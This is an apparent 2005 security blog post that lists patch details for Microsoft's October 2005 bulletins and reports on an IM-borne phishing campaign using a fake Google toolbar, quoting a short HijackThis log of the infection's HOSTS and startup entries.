• Microsoft DirectX 7.0 on Microsoft Windows 2000 with Service Pack 4 – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows XP Service Pack 1 and on Microsoft Windows XP with Service Pack 2 – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows XP Professional x64 Edition – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows Server 2003 and on Microsoft Windows Server 2003 with Service Pack 1 – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows Server 2003 for Itanium-based Systems and on Microsoft Windows Server 2003 with SP1 for Itanium-based Systems – Download the update

• Microsoft DirectX 8.1 on Microsoft Windows Server 2003 x64 Edition – Download the update

• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) –Available on Windows Update and Microsoft Update ONLY


Microsoft Security Bulletin MS05-052
Cumulative Security Update for Internet Explorer (896688)

Affected Software:
• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)


Affected Components:
• Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 – Download the update

• Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 or on Microsoft Windows XP Service Pack 1 – Download the update

• Internet Explorer 6 for Microsoft Windows XP Service Pack 2 – Download the update

• Internet Explorer 6 for Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 – Download the update

• Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems – Download the update

• Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition – Download the update

• Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition – Download the update

• Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition - Available on Windows Update and Microsoft Update ONLY

• Internet Explorer 6 Service Pack 1 on Microsoft Windows 98, on Microsoft Windows 98 SE, or on Microsoft Windows Millennium Edition - Available on Windows Update and Microsoft Update ONLY

Microsoft Security Bulletin MS05-05
Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400)

Affected Software:
• Microsoft Windows 2000 Service Pack 4 – Download the update

• Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 – Download the update

* Microsoft Windows XP Professional x64 Edition – Download the update

• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 – Download the update

• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems – Download the update

• Microsoft Windows Server 2003 x64 Edition – Download the update

Non-Affected Software:
Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)

There are 3 Critical, 4 Important, and 2 Moderate rated updates for October, 2005:
Microsoft Security Bulletin Summary for October 2005
Please visit the page to learn more about them.

To learn how Microsoft determines the category for
updates, please visit Microsoft Security Response Center Security Bulletin Severity Rating System .

Posted by MowGreen at 6:56 PM | Permalink | Comments (0) | TrackBacks (0)

From InformationWeek

Phishers are playing off Google's brand name, a security researcher said Wednesday, by flooding IM and IRC with messages that lead to a download of a bogus Google toolbar whose sole purpose is to steal credit card information.
Facetime's senior researcher Chris Boyd warned that two URL links are in circulation over instant messaging (IM) and Internet relay chat (IRC) channels; both links lead the naïve to a page which, among other actions, installs and launches a phony Google toolbar, hijacks the Windows HOSTS file, and adds the anti-spyware program known as "World Antispy." The toolbar, in connection with the rewritten HOSTS file, redirects most Google addresses and pops up a window asking for credit card information.

IMlogic, another IM security vendor, said in its alert that the IM side of the attack was limited to Yahoo Messenger users, and the hack was using some of the same vulnerabilities in Microsoft's Internet Explorer as the infamous CoolWebSearch, the broad name given to a line of sneaky software that has in the past been dubbed "the Ebola of adware." This is the first known instance of a CoolWebSearch-style attack being propagated over an IM network.

Boyd said that Facetime has spotted three variations of the attack, each one exploiting a different vulnerability and installing a slightly different payload.

"Hackers are clearly using new vectors such as IM to take advantage of reputable, trusted brands such as Google," said Boyd in a statement. "Our research finds that this phishing scam is financially motivated by a third party using incredibly elaborate bundles that deliver a rogue Google toolbar with many of the same elements as the real Google toolbar."

The phishing attack is just the latest threat coming in over IM networks. According to IMlogic, the number of IM assaults has jumped by 14 times since the first of the year. In the third quarter alone, IMlogic tracked 10 times the number of IM threats than in all of 2004.

Further reference can be found at : Google Toolbar Whacking - Developing Story

And, this is where the story first broke - Kephyr.com

Perfhost.com - 28 Sep 2005
The perfhost.com video shows how applications are installed without consent, by exploiting a security hole. The following programs appear in the Add/Remove programs dialog: "Google Toolbar for Internet Explorer" and "PremiumSearch StartPage". A short while after I ended the video capture a program called "WorldAntiSpy" also appeared. The following are some of the new entries that appears in the log:

C:\WINDOWS\System32\usbhdctl.exe
O1 - Hosts: 69.31.81.22 www.google.de
O1 - Hosts: 69.31.81.22 www.google.dj
O1 - Hosts: 69.31.81.22 www.google.dk
O1 - Hosts: 69.31.81.22 www.google.es
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program\google\googletoolbar2.dll
O4 - HKLM\..\Run: [apisvc.exe] C:\WINDOWS\System32\apisvc.exe
O4 - Global Startup: WorldAntiSpy.lnk = C:\Program\WorldAntiSpy\WorldAntiSpy.exe

For more details please look in the HijackThis logs (1, 2, 3).

I notified Google Toolbar Support about this issue on the 28th of September 2005. I am convinced Google will track down and stop the individual or company behind the non-consensual toolbar install.

Noted Windows - Security MVP, Chris Boyd, helped break this unfolding story.
They whacked Google !